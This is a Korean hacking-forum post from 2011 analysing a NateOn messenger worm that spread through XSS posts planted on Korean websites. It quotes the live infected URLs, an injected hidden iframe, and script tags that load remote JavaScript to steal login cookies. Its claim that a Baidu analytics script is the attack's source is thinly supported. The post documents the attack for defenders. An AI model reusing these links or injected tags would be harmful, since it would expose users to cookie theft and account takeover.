1577, 5/79 회원가입  로그인  
   푸른하늘
   http://www.cyworld.com/hsbluesky
   신형 중국발 네이트온 해킹 분석

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1659 [복사]


안녕하세요.

네이트온을 하는 한 유저로써 !!! - _-
한번 신형 해킹기법을 분석해 보았습니다.



다들 아시다시피 한명이 뿌리게 되면 그 쪽지의 링크를 열어보게되고 100명중 30명은 초기에 당합니다. 70명은 대중의 소문으로 인지하고있구요. 30명은 잘 모르는 분들.

30명의 계정은 또 로그인이 되어 추가된 유저들에게 뿌리게 되고...
삽시간에 쪽지는 돌고 돌고 또 돕니다. 올레 ~

자 이제 실전입니다.


해당 링크에 네이트온 로그인 하시고 클릭하지마십시오.
- 실제 해킹 url -

http://www.ka%6Dc.co.kr/nzeo/view.php?id=news&no=132

Do not click !!!

자 이제 링크의 특성을 살펴 봅시다.

co.kr 국내 url 링크입니다.
ka%6dc  url encoding 으로 링크를 변조하였습니다.
%6D = m

본래 url - http://www.kamc.co.kr/nzeo/view.php?id=news&no=132 - Do not click !!!


http://www.kamc.co.kr/  국내 사이트가 되는군요.
현재 해당 사이트에 전화를 하여 해당 게시글 삭제 요청을 하엿습니다.



- 신형 기법 -

국내의 취약한 웹사이트에 script 게시글을 올리게 됩니다.
해당 악성 스크립트 게시글은 XSS기법의 스크립트입니다.

네이트온 로그인 상태로 해당 쪽지를 받아 해당 링크로 가게 되면 쿠키값들이 악의적인 서버로 전송 되게 됩니다.
여기서 대부분 2~3번 이상을 전송하게 됩니다만. 혹여 실패가 일어나거나 변조 된다하더라도 10개중 2개의 값이 이상하고 8번이 같다. 그럼 당연 확률적으로 8번이 맞는 말이 됩니다. 따라서 여러번 전송하도록 되어있습니다.

해당 사이트 링크에 접속하면 해당 사이트에 모두 존재하지 않는 악의적 플래쉬 파일을 자동으로 내리 받습니다. 또한 다른 방식으로는 현재 신형기법에서는 그렇지 않지만 Active X 를 요구한다거나 여러 요청들을 보내어 백도어를 심어 좀비 pc 로 만들어버립니다.

우리가 가장 주의해야 할건 더이상 퍼지지 않도록 이런 쪽지들이 오면 절대로 열어봐선 안된다는 것 입니다.
공격당한 링크의 웹사이트 스크립트는 이미 감염되여 열어볼 시 네이트온 로그인 상태의 쿠키값이 넘어가게 됩니다.

그리고 국내 웹사이트 운영하시는 분들이 알아야 할 사실 하나.

국외의 공격이라 잡기가 힘든건 사실상 ...
왜 국내 사이트로 굳이 하는 걸 까요 ?

국외에서 프록시를 몇 번 돌려서 국내 사이트에 다시한번 우회해서 접근하여 사이트 하나에 글을 올립니다.
그리고는 타겟들이 들어오게 된다면 공격은 국내 사이트 내에서 이루워진다고 보시면 됩니다.

한마디로 꿩대신 닭이라는 말입니다.


- 실전 소스 분석 -


저 위의 사이트에 삽입된 소스에서 추출해낸 다른 소스입니다.

iframe 를 이용한 태그입니다.

두번째 타겟이 된 사이트입니다. 교회 사이트이며 역시나 국내사이트입니다.
여러곳을 거치게 만들어 역으로 잡는 것을 힘들게하며 잡을만 하면 다른 방법으로 또 빠져나가는 미꾸라지들입니다.

<iframe frameborder=0 src=http://www.imchurch.net/bbs/data/sub1_8/index.html width=100 height=1 scrolling=no></iframe>

저기에 보이는 해당 링크로 접속해 보았습니다.

<html><head><!-- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> -->


<meta http-equiv="content-type" content="text/html; charset=euc-kr">
<title>로그인</title>
<link rel="stylesheet" href="../style.css" type="text/css">
</head><body topmargin="0" leftmargin="0">
<!-- 새창 대신 사용하는 iframe -->
<iframe src="main.html" frameborder="0" height="10" scrolling="no" width="100"></iframe>
<script type="text/javascript" src="in.js"></script>
<script type="text/javascript" src="http://www.npcn.or.kr/zero/data/index/ajax.js"></script><script src="%20http://hm.baidu.com/h.js?b41ce2a26206d693a01237d661513b7c" type="text/javascript"></script>

</body></html>


로그인의 페이지가 tittle 만 그렇습니다.

저 안에 또다른 링크가 또 뜹니다. 역시 접근을 해보았습니다.


var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");
document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fb41ce2a26206d693a01237d661513b7c' type='text/javascript'%3E%3C/script%3E"));


http://hm.baidu.com/h.js?b41ce2a26206d693a01237d661513b7c


http://baidu.com/  

... 중국 사이트입니다.

결국 요즘 계속해서 들어오는 중국발 해킹의 근원지는 이곳입니다.

다른 공격도 마찬가지입니다. 소스 분석결과 해당 사이트가 나왔음을 명백하게 밝힙니다.

긴 글 읽어주셔서 감사합니다.

우리나라 또한 아이티 강국인만큼 아이티보안에 힘써야 합니다.

우리모두 분발하여 성공합시당.

화이팅 !!

  Hit : 11844     Date : 2011/02/12 06:04
[불법/스팸글로 신고하기]



    
rkdgh0112 정말감사 ㄷㄷ..
원리가 궁금했었는데
2011/02/12  
starsol 감사합니다.

친구들한테서 이러한 쪽지 많이 왔는데,,,

암튼, 보안에 더욱 힘써야겠어요~
2011/02/13  
xodnr631 엇.. 저도 친구 3명에게 동시에 이런 문자가 와서 제 티스토리에 작성대기 중 이였는데..
어쨌든 좋은 내용이니 참고하고 가겠습니다~ ^^
2011/02/13  
U_SoRang cross-site scripting....이었군요....;;;;; 2011/02/13  
white-hacker 잘봤습니다^^ 7~8월에 이어서 또다시 기승을 부리네요 2011/02/14  
ganesha 화이팅! 2011/02/15  
lsykoh2 화이팅 중국 크래커들 다 잡아버릴거야 2011/02/15  
chachadl73 신종 XSS 이네요...좋은정보 감사합니다. 2011/02/16  
내가해커 오오,,,, 저가몰랐던 중국 크래커들분석 감사합니다 2011/02/22  
ijs1415 오..수고하셨습니다~
감사해요!
2011/06/15  
yswang17 우와....중국 싫어요 ㅠㅠ 2011/07/23  
salis 감사합니다. 2011/08/19  
1497   슬래머가 네트워크를 마비시켰던 방법[8]     dkdkfjgh
06/22 7691
1496   스니핑     phan_tom2
10/01 6347
1495   스크립트알려주실분~2     lcd7132
05/03 4556
1494   스크립트알려주실분~1     lcd7132
05/03 4598
1493   스크립트알려주실분~     lcd7132
05/03 4455
1492   스크립트 알려주실분~2     lcd7132
04/29 4572
1491   스크립트 알려주실분~1     lcd7132
04/29 4390
1490   스크립트 알려주실분~     lcd7132
04/29 4538
1489   스크립트 잘만드시는분~     lcd7132
04/26 4378
1488   스피어피싱(네이버지식백과)-시사상식사전, 박문각     melody05
02/11 7903
1487   스프핑공격[2][2]     Nuker
01/02 7647
1486   스프핑공격 [1][6]     Nuker
12/28 8389
1485   신기한 프로그래밍 언어[2]     koreal33t
09/06 3118
  신형 중국발 네이트온 해킹 분석[12]     푸른하늘
02/12 11843
1483   심볼릭 링크걸기~☆ㅋ[1]     괴도js
07/25 8977
1482   실제 침투를 위한 해킹을 배우려면....[5]     choboKing
12/16 8254
1481   시스템 리소스 99%에 도전하자!![18]     DarkSlayer
09/10 15629
1480   시스템 해킹 공부방법이 궁금합니다.[1]     39ghwjd
09/12 5104
1479   시스템 해킹 + 리버싱 공부 가이드[1]     libera826
12/25 5531
1478   시스템 해킹[1]     phan_tom0
12/02 8549
[1][2][3][4] 5 [6][7][8][9][10]..[79]

Copyright 1999-2022 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org & Wowhacker.com